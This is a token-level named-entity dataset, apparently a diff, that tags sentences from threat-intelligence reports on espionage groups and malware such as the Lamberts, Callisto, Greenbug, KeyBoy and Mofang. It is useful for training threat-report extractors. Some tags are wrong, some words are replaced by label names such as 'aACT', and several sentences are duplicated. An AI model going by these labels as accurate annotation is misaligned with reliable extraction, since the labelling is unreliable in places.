+samples E-MAL
+, O
+indicating O
+a O
+close O
+relationship O
+between O
+the O
+White S-MAL
+and O
+Pink B-MAL
+Lambert I-MAL
+malware I-MAL
+families E-MAL
+. O
+
+While O
+in O
+most O
+cases O
+the O
+infection O
+vector O
+remains O
+unknown O
+, O
+the O
+high B-ACT
+profile I-ACT
+attack E-ACT
+from O
+2014 S-TIME
+used O
+a O
+very O
+complex O
+Windows S-OS
+TTF O
+zero-day S-VULNAME
+exploit S-VULNAME
+( O
+CVE-2014-4148 S-VULID
+) O
+. O
+
+This O
+migration B-ACT
+activity E-ACT
+was O
+last O
+observed O
+in O
+October B-TIME
+2016 E-TIME
+. O
+
+Most O
+of O
+the O
+Blue B-MAL
+and I-MAL
+Green I-MAL
+Lambert I-MAL
+samples E-MAL
+have O
+two O
+C&C S-TOOL
+servers O
+hardcoded O
+in O
+their O
+configuration O
+block O
+: O
+a O
+hostname O
+and O
+an O
+IP S-PROT
+address O
+. O
+
+Some O
+of O
+the O
+known O
+filenames O
+for O
+Gray B-MAL
+Lambert E-MAL
+are O
+mwapi32.dll S-MAL
+and O
+poolstr.dll S-MAL
+– O
+it O
+should O
+be O
+pointed O
+though O
+that O
+the O
+filenames O
+used O
+by O
+the O
+Lamberts S-MAL
+are O
+generally O
+unique O
+and O
+have O
+never O
+been O
+used O
+twice O
+. O
+
+Black B-MAL
+Lambert E-MAL
+was O
+seen O
+only O
+briefly O
+and O
+we O
+assume O
+it O
+was O
+" O
+retired O
+" O
+from O
+the O
+arsenal O
+after O
+being O
+discovered O
+by O
+FireEye S-SECTEAM
+in O
+2014 S-TIME
+. O
+
+The O
+Lamberts B-MAL
+toolkit E-MAL
+spans O
+across O
+several O
+years O
+, O
+with O
+most O
+activity O
+occurring O
+in O
+2013 S-TIME
+and O
+2014 S-TIME
+. O
+
+To O
+further O
+exemplify O
+the O
+proficiency O
+of O
+the O
+attackers O
+leveraging O
+the O
+Lamberts B-MAL
+toolkit E-MAL
+, O
+deployment O
+of O
+Black B-MAL
+Lambert E-MAL
+included O
+a O
+rather O
+sophisticated O
+TTF O
+zero B-VULNAME
+day E-VULNAME
+exploit S-VULNAME
+, O
+CVE-2014-4148 S-VULID
+. O
+
+Taking O
+that O
+into O
+account O
+, O
+we O
+classify O
+the O
+Lamberts S-MAL
+as O
+the O
+same O
+level O
+of O
+complexity O
+as O
+Regin S-MAL
+, O
+ProjectSauron S-MAL
+, O
+Equation S-MAL
+and O
+Duqu2 S-MAL
+, O
+which O
+makes O
+them O
+one O
+of O
+the O
+most O
+sophisticated O
+Cyber B-ACT
+Espionage E-ACT
+toolkits O
+we O
+have O
+ever O
+analysed O
+. O
+
+Taking O
+that O
+into O
+account O
+, O
+we O
+classify O
+the O
+Lamberts S-MAL
+as O
+the O
+same O
+level O
+of O
+complexity O
+as O
+Regin S-MAL
+, O
+ProjectSauron S-MAL
+, O
+Equation S-MAL
+and O
+Duqu2 S-MAL
+, O
+which O
+makes O
+them O
+one O
+of O
+the O
+most O
+sophisticated O
+Cyber B-ACT
+Espionage E-ACT
+toolkits O
+we O
+have O
+ever O
+analysed O
+. O
+
+On O
+January B-TIME
+15 E-TIME
+, O
+Confiant O
+exposed O
+the O
+activity O
+of O
+the O
+Zirconium O
+group O
+, O
+spreading O
+malicious O
+ads O
+via O
+a O
+network O
+of O
+fake B-IDTY
+ad I-IDTY
+agencies E-IDTY
+through O
+2017 S-TIME
+, O
+in O
+what O
+amounted O
+to O
+the O
+largest O
+malvertising O
+campaign O
+of O
+recent O
+times O
+. O
+
+Cadelle O
+, O
+uses O
+Backdoor.Cadelspy S-MAL
+. O
+
+Symantec S-SECTEAM
+telemetry O
+identified O
+Cadelle O
+and O
+Chafer B-ACT
+activity E-ACT
+dating O
+from O
+as O
+far O
+back O
+as O
+July B-TIME
+2014 E-TIME
+, O
+however O
+, O
+it's O
+likely O
+that O
+activity O
+began O
+well O
+before O
+this O
+date O
+. O
+
+Chafer O
+, O
+uses O
+Backdoor.Remexi S-MAL
+. O
+
+Cadelle O
+'s O
+threats O
+are O
+capable O
+of O
+opening O
+a O
+back O
+door O
+and O
+stealing O
+information O
+from O
+victims' O
+computers O
+. O
+
+Chafer O
+, O
+uses O
+Backdoor.Remexi.B S-MAL
+. O
+
+registrant O
+information O
+points O
+to O
+activity O
+possibly O
+as O
+early O
+as O
+2011 S-TIME
+. O
+
+These O
+threats O
+are O
+capable O
+of O
+opening O
+a O
+back O
+door O
+and O
+stealing O
+information O
+from O
+victims' O
+computers O
+. O
+
+executable O
+compilation O
+times O
+suggest O
+early O
+2012 S-TIME
+. O
+
+It's O
+unclear O
+how O
+Cadelle O
+infects O
+its O
+targets O
+with O
+Backdoor.Cadelspy S-MAL
+. O
+
+The O
+affected O
+organizations O
+we O
+were O
+able O
+to O
+identify O
+are O
+mostly O
+based O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+one O
+organization O
+is O
+located O
+in O
+the O
+US S-LOC
+. O
+
+There O
+are O
+a O
+number O
+of O
+factors O
+in O
+these O
+groups' O
+campaigns S-ACT
+that O
+suggests O
+that O
+the O
+attackers O
+may O
+be O
+based O
+in O
+Iran S-LOC
+. O
+
+Remexi S-MAL
+is O
+a O
+basic O
+back O
+door O
+Trojan S-MAL
+that O
+allows O
+attackers O
+to O
+open O
+a O
+remote O
+shell O
+on O
+the O
+computer O
+and O
+execute O
+commands O
+. O
+
+Their O
+primary O
+interest O
+appears O
+to O
+be O
+gathering O
+intelligence O
+. O
+
+This O
+stands O
+in O
+opposition O
+to O
+the O
+data O
+gathered O
+from O
+export O
+timestamps O
+and O
+C&C B-ACT
+domain I-ACT
+activity E-ACT
+that O
+points O
+to O
+Green B-MAL
+Lambert E-MAL
+being O
+considerably O
+older O
+than O
+the O
+Blue S-MAL
+variant O
+. O
+
+security O
+policy O
+in O
+the O
+Eastern S-LOC
+Europe S-LOC
+and O
+South O
+Caucasus O
+regions O
+. O
+
+Callisto O
+Group O
+via O
+credential O
+phishingThese O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+were O
+crafted O
+to O
+appear O
+highly O
+convincing O
+, O
+including O
+being O
+sent O
+from O
+legitimate O
+email S-TOOL
+accounts O
+suspected O
+to O
+have O
+been O
+previously O
+compromised O
+by O
+the O
+Callisto O
+Group O
+via O
+credential O
+phishing S-ACT
+. O
+
+In O
+early O
+2016 S-TIME
+the O
+Callisto O
+Group O
+began O
+sending O
+highly O
+targeted O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+malicious B-FILE
+attachments E-FILE
+that O
+contained O
+, O
+as O
+their O
+final O
+payload O
+, O
+the O
+" O
+Scout S-MAL
+" O
+malware O
+tool O
+from O
+the O
+HackingTeam O
+RCS O
+Galileo O
+platform O
+. O
+
+These O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+were O
+crafted O
+to O
+appear O
+highly O
+convincing O
+, O
+including O
+being O
+sent O
+from O
+legitimate O
+email S-TOOL
+accounts O
+suspected O
+to O
+have O
+been O
+previously O
+compromised O
+by O
+the O
+Callisto O
+Group O
+via O
+credential O
+phishing S-ACT
+. O
+
+Callisto O
+Group O
+appears O
+to O
+be O
+intelligence O
+gathering O
+related O
+to O
+European O
+foreign O
+and O
+security O
+policy O
+. O
+
+some O
+indications O
+of O
+loosely O
+linked O
+activity O
+dating O
+back O
+to O
+at O
+least O
+2013 S-TIME
+. O
+
+In O
+October B-TIME
+2015 E-TIME
+, O
+the O
+Callisto B-APT
+Group E-APT
+was O
+observed O
+sending O
+targeted O
+credential O
+phishing B-ACT
+emails S-TOOL
+. O
+
+In O
+early O
+2016 S-TIME
+, O
+the O
+Callisto O
+Group O
+was O
+observed O
+sending O
+targeted O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+. O
+
+The O
+malicious B-FILE
+attachments E-FILE
+purported O
+to O
+be O
+invitations S-MAL
+or O
+drafts B-MAL
+of I-MAL
+the I-MAL
+agenda E-MAL
+for O
+the O
+conference O
+. O
+
+Based O
+on O
+our O
+analysis O
+of O
+Callisto B-APT
+Group E-APT
+'s O
+usage O
+of O
+RCS O
+Galileo O
+, O
+we O
+believe O
+the O
+Callisto O
+Group O
+did O
+not O
+utilize O
+the O
+leaked O
+RCS O
+Galileo O
+source O
+code O
+, O
+but O
+rather O
+used O
+the O
+leaked O
+readymade O
+installers S-MAL
+to O
+set O
+up O
+their O
+own O
+installation O
+of O
+the O
+RCS O
+Galileo O
+platform O
+. O
+
+In O
+the O
+known O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+by O
+the O
+Callisto B-APT
+Group E-APT
+, O
+they O
+employed O
+the O
+" O
+Scout S-MAL
+" O
+malware O
+tool O
+from O
+the O
+RCS O
+Galileo S-APT
+platform O
+. O
+
+We O
+are O
+confident O
+the O
+Callisto O
+Group O
+used O
+this O
+type O
+of O
+access O
+to O
+a O
+target O
+'s O
+email S-TOOL
+account O
+for O
+the O
+purposes O
+of O
+sending O
+spear B-ACT
+phishing E-ACT
+to O
+other O
+targets O
+. O
+
+If O
+a O
+target O
+of O
+the O
+spear B-ACT
+phishing E-ACT
+described O
+in O
+" O
+Phase O
+2 O
+: O
+malware O
+deployment O
+" O
+opened O
+the O
+email B-ACT
+attachment E-ACT
+and O
+, O
+crucially O
+, O
+clicked O
+on O
+the O
+icon O
+in O
+the O
+attachment O
+, O
+this O
+would O
+lead O
+to O
+the O
+target O
+'s O
+computer O
+becoming O
+infected O
+with O
+the O
+" O
+Scout S-MAL
+" O
+malware O
+tool O
+from O
+the O
+RCS O
+Galileo O
+platform O
+. O
+
+Callisto O
+Group O
+and O
+related O
+infrastructure O
+contain O
+links O
+to O
+at O
+least O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+and O
+China S-LOC
+. O
+
+they O
+have O
+been O
+last O
+known O
+to O
+employ O
+malware O
+in O
+February B-TIME
+2016 E-TIME
+. O
+
+RCS O
+Galileo O
+platform O
+. O
+
+The O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+used O
+in O
+the O
+known O
+attacks O
+by O
+the O
+Callisto B-APT
+Group E-APT
+were O
+so O
+convincing O
+that O
+even O
+skilled O
+and O
+alert O
+users O
+would O
+likely O
+have O
+attempted O
+to O
+open O
+the O
+malicious O
+attachment O
+. O
+
+In O
+October B-TIME
+2015 E-TIME
+the O
+Callisto O
+Group O
+targeted O
+a O
+handful O
+of O
+individuals O
+with O
+phishing B-ACT
+emails S-TOOL
+that O
+attempted O
+to O
+obtain O
+the O
+target O
+'s O
+webmail O
+credentials O
+. O
+
+The O
+Callisto O
+Group O
+has O
+been O
+active O
+at O
+least O
+since O
+late O
+2015 S-TIME
+and O
+continues O
+to O
+be O
+so O
+, O
+including O
+continuing O
+to O
+set O
+up O
+new O
+phishing B-ACT
+infrastructure E-ACT
+every O
+week O
+. O
+
+Called O
+Greenbug O
+, O
+this O
+group O
+is O
+believed O
+to O
+be O
+instrumental O
+in O
+helping O
+Shamoon O
+steal O
+user O
+credentials O
+of O
+targets O
+ahead O
+of O
+Shamoon O
+'s O
+destructive B-ACT
+attacks E-ACT
+. O
+
+On O
+Tuesday S-TIME
+, O
+Arbor B-SECTEAM
+Networks E-SECTEAM
+said O
+that O
+it O
+has O
+new O
+leads O
+on O
+a O
+credential O
+stealing O
+remote O
+access O
+Trojan S-MAL
+( O
+RAT S-MAL
+) O
+called O
+Ismdoor S-MAL
+, O
+possibly O
+used O
+by O
+Greenbug O
+to O
+steal O
+credentials O
+on O
+Shamoon O
+'s O
+behalf O
+. O
+
+" O
+With O
+our O
+latest O
+research O
+we O
+now O
+see O
+how O
+Greenbug O
+has O
+shifted O
+aACT O
+from O
+HTTP-based O
+C2 S-TOOL
+communication O
+with O
+Ismdoor S-MAL
+. O
+
+It's O
+now O
+relying O
+on O
+a O
+new O
+DNS-based B-MAL
+attack I-MAL
+technique E-MAL
+to O
+better O
+cloak O
+command O
+and O
+control O
+communications O
+between O
+Greenbug O
+and O
+the O
+malware O
+" O
+, O
+said O
+Dennis O
+Schwarz O
+, O
+research O
+analyst O
+on O
+Arbor B-SECTEAM
+'s I-SECTEAM
+ASERT I-SECTEAM
+Team E-SECTEAM
+, O
+in O
+an O
+interview O
+with O
+Threatpost O
+. O
+
+t's O
+now O
+relying O
+on O
+a O
+new O
+DNS-based B-MAL
+attack I-MAL
+technique E-MAL
+to O
+better O
+cloak O
+command O
+and O
+control O
+communications O
+between O
+Greenbug O
+and O
+the O
+malware O
+" O
+, O
+said O
+Dennis O
+Schwarz O
+, O
+research O
+analyst O
+on O
+Arbor B-SECTEAM
+'s I-SECTEAM
+ASERT I-SECTEAM
+Team E-SECTEAM
+, O
+in O
+an O
+interview O
+with O
+Threatpost O
+. O
+
+By O
+relying O
+on O
+a O
+native O
+PDF B-ACT
+command E-ACT
+to O
+navigate O
+to O
+a O
+new O
+URL S-ACT
+, O
+Zirconium O
+successfully O
+circumvented O
+Chrome O
+'s O
+anti-redirect O
+protection O
+. O
+
+In O
+the O
+context O
+of O
+the O
+Ismdoor B-MAL
+RAT E-MAL
+, O
+the O
+DNS B-ACT
+attack E-ACT
+technique O
+is O
+used O
+primarily O
+by O
+Greenbug O
+for O
+stealing O
+credentials O
+. O
+
+To O
+do O
+this O
+, O
+it O
+employs O
+a O
+number O
+of O
+specific O
+commands O
+via O
+DNSMessenger S-MAL
+. O
+
+Iranian O
+Threat O
+Agent O
+Greenbug O
+has O
+been O
+registering O
+domains O
+similar O
+to O
+those O
+of O
+Israeli O
+High-Tech S-IDTY
+and O
+Cyber B-IDTY
+Security I-IDTY
+Companies E-IDTY
+. O
+
+By O
+pivoting O
+off O
+the O
+registration O
+details O
+and O
+servers O
+data O
+of O
+the O
+two O
+domains O
+we O
+discovered O
+others O
+registered O
+by O
+the O
+threat O
+agent O
+. O
+
+Named O
+Trochilus S-MAL
+, O
+this O
+new O
+RAT S-MAL
+was O
+part O
+of O
+Group O
+27 O
+'s O
+malware O
+portfolio O
+that O
+included O
+six O
+other O
+malware O
+strains O
+, O
+all O
+served O
+together O
+or O
+in O
+different O
+combinations O
+, O
+based O
+on O
+the O
+data O
+that O
+needed O
+to O
+be O
+stolen O
+from O
+each O
+victim O
+. O
+
+According O
+to O
+the O
+security O
+experts O
+, O
+this O
+collection O
+of O
+malware O
+was O
+discovered O
+after O
+their O
+first O
+initial O
+report O
+was O
+published O
+, O
+meaning O
+that O
+Group O
+27 O
+ignored O
+the O
+fact O
+they O
+were O
+unmasked O
+and O
+continued O
+to O
+infect O
+their O
+targets O
+regardless O
+, O
+through O
+the O
+same O
+entry O
+point O
+, O
+the O
+Myanmar B-IDTY
+Union I-IDTY
+Election I-IDTY
+Commission E-IDTY
+( O
+UEC S-IDTY
+) O
+website O
+. O
+
+Trochilus B-ACT
+RAT I-ACT
+activity E-ACT
+was O
+discovered O
+during O
+both O
+months O
+of O
+October O
+and O
+November B-TIME
+2015 E-TIME
+. O
+
+From O
+September B-TIME
+2016 E-TIME
+through O
+late O
+November B-TIME
+2016 E-TIME
+, O
+a O
+threat O
+actor O
+group O
+used O
+both O
+the O
+Trochilus B-MAL
+RAT E-MAL
+and O
+a O
+newly O
+idenfied O
+RAT S-MAL
+we've O
+named O
+MoonWind S-MAL
+to O
+target O
+organizations O
+in O
+Thailand O
+, O
+including O
+a O
+utility B-IDTY
+organization E-IDTY
+. O
+
+We O
+chose O
+the O
+name O
+' O
+MoonWind S-MAL
+' O
+based O
+on O
+debugging O
+strings O
+we O
+saw O
+within O
+the O
+samples O
+, O
+as O
+well O
+as O
+the O
+compiler O
+used O
+to O
+generate O
+the O
+samples O
+. O
+
+The O
+attackers O
+compromised O
+two O
+legitimate B-MAL
+Thai I-MAL
+websites E-MAL
+to O
+host O
+the O
+malware O
+, O
+which O
+is O
+a O
+tactic O
+this O
+group O
+has O
+used O
+in O
+the O
+past O
+. O
+
+Both O
+the O
+Trochilus S-MAL
+and O
+MoonWind B-MAL
+RATs E-MAL
+were O
+hosted O
+on O
+the O
+same O
+compromised O
+sites O
+and O
+used O
+to O
+target O
+the O
+same O
+organization O
+at O
+the O
+same O
+time O
+. O
+
+The O
+attackers O
+used O
+different O
+command B-MAL
+and I-MAL
+control I-MAL
+servers E-MAL
+( O
+C2s O
+) O
+for O
+each O
+malware O
+family O
+, O
+a O
+tactic O
+we O
+believe O
+was O
+meant O
+to O
+thwart O
+attempts O
+to O
+tie O
+the O
+attacks O
+together O
+using O
+infrastructure O
+alone O
+. O
+
+Further O
+research O
+led O
+us O
+to O
+additional O
+MoonWind B-MAL
+samples E-MAL
+using O
+the O
+same O
+C2 S-TOOL
+( O
+dns.webswindows.com O
+) O
+but O
+hosted O
+on O
+a O
+different O
+compromised O
+but O
+legitimate B-MAL
+website E-MAL
+. O
+
+The O
+attacks O
+in O
+that O
+case O
+took O
+place O
+in O
+late O
+September O
+to O
+early O
+October B-TIME
+2016 E-TIME
+and O
+the O
+attackers O
+stored O
+the O
+MoonWind B-MAL
+samples E-MAL
+as O
+RAR B-MAL
+files E-MAL
+, O
+while O
+in O
+the O
+November B-ACT
+attacks E-ACT
+the O
+RATs S-MAL
+were O
+stored O
+as O
+executables O
+. O
+
+We O
+were O
+not O
+able O
+to O
+find O
+additional O
+tools O
+, O
+but O
+the O
+attackers O
+again O
+compromised O
+a O
+legitimate O
+Thai O
+website O
+to O
+host O
+their O
+malware O
+, O
+in O
+this O
+case O
+the O
+student O
+portal O
+for O
+a O
+Thai O
+University O
+. O
+
+Trochilus S-MAL
+was O
+first O
+reported O
+by O
+Arbor B-SECTEAM
+Networks E-SECTEAM
+in O
+their O
+Seven O
+Pointed O
+Dagger O
+report O
+tying O
+its O
+use O
+to O
+other O
+targeted O
+Southeast B-LOC
+Asia I-LOC
+activity E-LOC
+. O
+
+The O
+activity O
+dates O
+to O
+at O
+least O
+2013 S-TIME
+and O
+has O
+ties O
+to O
+multiple O
+reports O
+by O
+other O
+researchers O
+. O
+
+It O
+is O
+highly O
+likely O
+MoonWind S-MAL
+is O
+yet O
+another O
+new O
+tool O
+being O
+used O
+by O
+the O
+group O
+or O
+groups O
+responsible O
+for O
+that O
+activity O
+, O
+indicating O
+they O
+are O
+not O
+only O
+still O
+active O
+but O
+continuing O
+to O
+evolve O
+their O
+playbook O
+. O
+
+The O
+samples O
+provided O
+were O
+alleged O
+to O
+be O
+targeting O
+Tibetan S-LOC
+and O
+Chinese B-LOC
+Pro-Democracy I-IDTY
+Activists E-IDTY
+. O
+
+On O
+June B-TIME
+7 E-TIME
+, O
+2013 S-TIME
+, O
+Rapid7 S-SECTEAM
+released O
+an O
+analysis O
+of O
+malware O
+dubbed O
+' O
+KeyBoy S-MAL
+' O
+, O
+also O
+exploiting O
+unknown O
+vulnerabilities O
+in O
+Microsoft S-IDTY
+Office O
+, O
+similarly O
+patched O
+by O
+MS12-060 S-MAL
+, O
+but O
+allegedly O
+targeting O
+interests O
+in O
+Vietnam S-LOC
+and O
+India S-LOC
+. O
+
+As O
+we O
+have O
+seen O
+in O
+some O
+previous O
+targeted B-ACT
+malware I-ACT
+attacks E-ACT
+, O
+the O
+attackers O
+in O
+this O
+incident O
+are O
+taking O
+advantage O
+of O
+services O
+like O
+changeIP
+. O
+
+com O
+to O
+establish O
+free O
+subdomains O
+in O
+their O
+infrastructure O
+. O
+
+Blending O
+in O
+with O
+legitimate B-MAL
+traffic E-MAL
+is O
+a O
+common O
+tactic O
+used O
+by O
+attackers O
+to O
+help O
+fly O
+under O
+the O
+radar O
+. O
+
+Subdomains O
+at O
+phmail.us O
+have O
+been O
+linked O
+to O
+malicious B-ACT
+activity E-ACT
+dating O
+back O
+as O
+far O
+as O
+December B-TIME
+2011 E-TIME
+. O
+
+Based O
+on O
+the O
+patterns O
+of O
+subdomain O
+registration O
+over O
+time O
+in O
+DNS S-PROT
+, O
+TRAC S-SECTEAM
+believes O
+this O
+is O
+an O
+example O
+where O
+the O
+attackers O
+registered O
+their O
+own O
+second-level O
+domain O
+. O
+
+In O
+this O
+blog O
+post O
+we'll O
+analyze O
+two O
+specific O
+incidents O
+apparently O
+targeting O
+victims O
+in O
+Vietnam S-LOC
+and O
+in O
+India S-LOC
+and O
+we'll O
+describe O
+the O
+capabilities O
+of O
+the O
+custom O
+backdoor S-MAL
+being O
+used O
+that O
+for O
+convenience O
+( O
+and O
+to O
+our O
+knowledge O
+, O
+for O
+a O
+lack O
+of O
+an O
+existing O
+name O
+) O
+we O
+call O
+KeyBoy S-MAL
+, O
+due O
+to O
+a O
+string O
+present O
+in O
+one O
+of O
+the O
+samples O
+. O
+
+We O
+encountered O
+the O
+first O
+document O
+exploit S-VULNAME
+called O
+" O
+THAM B-FILE
+luan I-FILE
+- I-FILE
+GD I-FILE
+- E-FILE
+NCKH2.doc S-FILE
+" O
+a O
+few O
+days O
+ago O
+, O
+which O
+appears O
+to O
+be O
+leveraging O
+some O
+vulnerabilities O
+patched O
+with O
+MS12-060 S-MAL
+. O
+
+This O
+document O
+, O
+written O
+in O
+Vietnamese O
+, O
+appears O
+to O
+be O
+reviewing O
+and O
+discussing O
+best O
+practices O
+for O
+teaching O
+and O
+researching O
+scientific O
+topics O
+. O
+
+For O
+the O
+sake O
+of O
+this O
+analysis O
+we'll O
+take O
+the O
+Vietnamese B-MAL
+backdoor E-MAL
+as O
+an O
+example O
+; O
+the O
+one O
+found O
+in O
+the O
+Indian B-ACT
+attack E-ACT
+operates O
+in O
+the O
+exact O
+same O
+ACT O
+. O
+
+In O
+the O
+second O
+set O
+they O
+are O
+making O
+use O
+of O
+a O
+dynamic B-MAL
+DNS I-MAL
+service E-MAL
+by O
+ChangeIP
+. O
+
+com O
+. O
+
+The O
+Tibetan B-IDTY
+community E-IDTY
+has O
+been O
+targeted O
+for O
+over O
+a O
+decade O
+by O
+espionage B-ACT
+operations E-ACT
+that O
+use O
+malware S-MAL
+to O
+infiltrate O
+communications O
+and O
+gather O
+information O
+. O
+
+he O
+Tibetan B-IDTY
+community E-IDTY
+has O
+been O
+targeted O
+for O
+over O
+a O
+decade O
+by O
+espionage B-ACT
+operations E-ACT
+that O
+use O
+malware S-MAL
+to O
+infiltrate O
+communications O
+and O
+gather O
+information O
+. O
+
+They O
+are O
+often O
+targeted O
+simultaneously O
+with O
+other O
+ethnic B-IDTY
+minorities E-IDTY
+and O
+religious B-IDTY
+groups E-IDTY
+in O
+China S-LOC
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+More O
+recently O
+in O
+2016 S-TIME
+, O
+Arbor B-SECTEAM
+Networks E-SECTEAM
+reported O
+on O
+connected O
+malware O
+operations O
+continuing O
+to O
+target O
+these O
+same O
+groups O
+, O
+which O
+the O
+Communist O
+Party O
+of O
+China O
+perceives O
+as O
+a O
+threat O
+to O
+its O
+power O
+. O
+
+There O
+is O
+the O
+exploit B-FILE
+code E-FILE
+and O
+malware O
+used O
+to O
+gain O
+access O
+to O
+systems O
+, O
+the O
+infrastructure O
+that O
+provides O
+command O
+and O
+control O
+to O
+the O
+malware O
+operator O
+, O
+and O
+the O
+human O
+elements O
+– O
+developers O
+who O
+create O
+the O
+malware O
+, O
+operators O
+who O
+deploy O
+it O
+, O
+and O
+analysts O
+who O
+extract O
+value O
+from O
+the O
+stolen O
+information O
+. O
+
+For O
+example O
+, O
+we O
+have O
+observed O
+frequent O
+reuse O
+of O
+older O
+( O
+patched O
+) O
+exploits O
+in O
+malware O
+operations O
+against O
+the O
+Tibetan B-IDTY
+community E-IDTY
+. O
+
+These O
+operations O
+involved O
+highly O
+targeted O
+email B-MAL
+lures E-MAL
+with O
+repurposed O
+content O
+and O
+attachments O
+that O
+contained O
+an O
+updated O
+version O
+of O
+KeyBoy S-MAL
+. O
+
+In O
+August O
+and O
+October B-TIME
+2016 E-TIME
+we O
+observed O
+a O
+malware B-ACT
+operation E-ACT
+targeting O
+members O
+of O
+the O
+Tibetan B-IDTY
+Parliament E-IDTY
+( O
+the O
+highest O
+legislative O
+organ O
+of O
+the O
+Tibetan B-IDTY
+government E-IDTY
+in O
+exile O
+, O
+formally O
+known O
+as O
+Central B-IDTY
+Tibetan I-IDTY
+Administration E-IDTY
+) O
+. O
+
+The O
+Arbor S-SECTEAM
+report O
+describes O
+the O
+ongoing O
+use O
+of O
+these O
+four O
+vulnerabilities O
+in O
+a O
+series O
+of O
+espionage B-ACT
+campaigns E-ACT
+against O
+not O
+only O
+Tibetan B-IDTY
+groups E-IDTY
+, O
+but O
+also O
+others O
+related O
+to O
+Hong B-LOC
+Kong E-LOC
+, O
+Taiwan S-LOC
+, O
+and O
+Uyghur S-LOC
+interests O
+. O
+
+The O
+malware O
+samples O
+deployed O
+in O
+both O
+of O
+these O
+operations O
+are O
+updated O
+versions O
+of O
+the O
+KeyBoy B-MAL
+backdoor E-MAL
+first O
+discussed O
+in O
+2013 S-TIME
+by O
+Rapid7 S-SECTEAM
+. O
+
+This O
+behavioural O
+tactic O
+was O
+previously O
+mentioned O
+in O
+relation O
+to O
+KeyBoy S-MAL
+in O
+a O
+2013 S-TIME
+blog O
+post O
+by O
+Cisco S-SECTEAM
+. O
+
+These O
+versions O
+of O
+KeyBoy S-MAL
+differed O
+from O
+the O
+one O
+first O
+described O
+by O
+Rapid7 S-SECTEAM
+in O
+several O
+ACTs O
+, O
+many O
+of O
+which O
+will O
+be O
+described O
+in O
+the O
+sections O
+to O
+follow O
+. O
+
+These O
+samples O
+were O
+contained O
+in O
+exploit S-VULNAME
+documents O
+containing O
+distinct O
+lure O
+content O
+, O
+one O
+having O
+a O
+Tibetan O
+nexus O
+, O
+the O
+other O
+an O
+Indian S-LOC
+nexus O
+. O
+
+We O
+believe O
+the O
+2013 S-TIME
+, O
+2015 S-TIME
+, O
+and O
+2016 S-TIME
+KeyBoy B-MAL
+samples E-MAL
+provide O
+evidence O
+of O
+a O
+development O
+effort O
+focused O
+on O
+changing O
+components O
+that O
+would O
+be O
+used O
+by O
+researchers O
+to O
+develop O
+detection O
+signatures O
+. O
+
+In O
+another O
+modification O
+, O
+first O
+observed O
+in O
+the O
+most O
+recent O
+October S-TIME
+11 O
+Parliamentarian O
+operation O
+( O
+version O
+agewkassif O
+) O
+, O
+the O
+developer O
+(s O
+) O
+of O
+KeyBoy S-MAL
+began O
+using O
+a O
+string B-MAL
+obfuscation I-MAL
+routine E-MAL
+in O
+order O
+to O
+hide O
+many O
+of O
+the O
+critical O
+values O
+referenced O
+within O
+the O
+malware O
+. O
+
+Trend B-SECTEAM
+Micro E-SECTEAM
+specifically O
+noted O
+that O
+the O
+2013 S-TIME
+versions O
+of O
+KeyBoy S-MAL
+used O
+the O
+same O
+algorithm O
+for O
+encoding O
+their O
+configuration O
+files O
+as O
+was O
+observed O
+in O
+the O
+Operation B-ACT
+Tropic I-ACT
+Trooper E-ACT
+malware O
+. O
+
+This O
+sample O
+was O
+also O
+found O
+to O
+be O
+deployed O
+using O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+. O
+
+The O
+operation O
+against O
+the O
+Tibetan B-IDTY
+Parliamentarians E-IDTY
+illustrates O
+the O
+continued O
+use O
+of O
+malicious B-FILE
+attachments E-FILE
+in O
+the O
+form O
+of O
+documents B-MAL
+bearing I-MAL
+exploits E-MAL
+. O
+
+Chances O
+are O
+about O
+even O
+, O
+though O
+, O
+that O
+Mofang S-APT
+is O
+a O
+relevant O
+threat O
+actor O
+to O
+any O
+organization O
+that O
+invests O
+in O
+Myanmar S-LOC
+or O
+is O
+otherwise O
+politically S-IDTY
+involved O
+. O
+
+In O
+addition O
+to O
+the O
+campaign O
+in O
+Myanmar S-LOC
+, O
+Mofang S-APT
+has O
+been O
+observed O
+to O
+attack O
+targets O
+across O
+multiple O
+sectors O
+( O
+government S-IDTY
+, O
+military S-IDTY
+, O
+critical B-IDTY
+infrastructure E-IDTY
+and O
+the O
+automotive S-IDTY
+and O
+weapon B-IDTY
+industries E-IDTY
+) O
+in O
+multiple O
+countries O
+. O
+
+This O
+threat O
+report O
+gives O
+insight O
+into O
+some O
+of O
+the O
+information O
+that O
+Fox-IT S-SECTEAM
+has O
+about O
+a O
+threat O
+actor O
+that O
+it O
+follows O
+, O
+called O
+Mofang S-APT
+. O
+
+The O
+name O
+Mofang S-APT
+is O
+based O
+on O
+the O
+Mandarin O
+verb O
+, O
+which O
+means O
+to O
+imitate O
+. O
+
+It O
+is O
+highly O
+likely O
+that O
+the O
+Mofang B-APT
+group E-APT
+is O
+a O
+group O
+that O
+operates O
+out O
+of O
+China S-LOC
+and O
+is O
+probably O
+government-affiliated O
+. O
+
+Chapter O
+7 O
+explains O
+the O
+working O
+of O
+Mofang O
+'s O
+preferred O
+tools O
+: O
+ShimRat S-MAL
+and O
+SimRatReporter S-MAL
+. O
+
+The O
+Mofang B-APT
+group E-APT
+has O
+been O
+active O
+in O
+relation O
+to O
+the O
+Kyaukphyu O
+sez O
+. O
+
+KeyBoy S-MAL
+provides O
+basic O
+backdoor O
+functionality O
+, O
+allowing O
+the O
+operators O
+to O
+select O
+from O
+various O
+capabilities O
+used O
+to O
+surveil O
+and O
+steal O
+information O
+from O
+the O
+victim O
+machine O
+. O
+
+The O
+first O
+attack O
+started O
+in O
+early O
+July S-TIME
+with O
+a O
+ShimRatReporter S-FILE
+payload O
+. O
+
+Myanmar S-LOC
+has O
+been O
+the O
+target O
+of O
+Mofang S-APT
+'s O
+attacks O
+for O
+years O
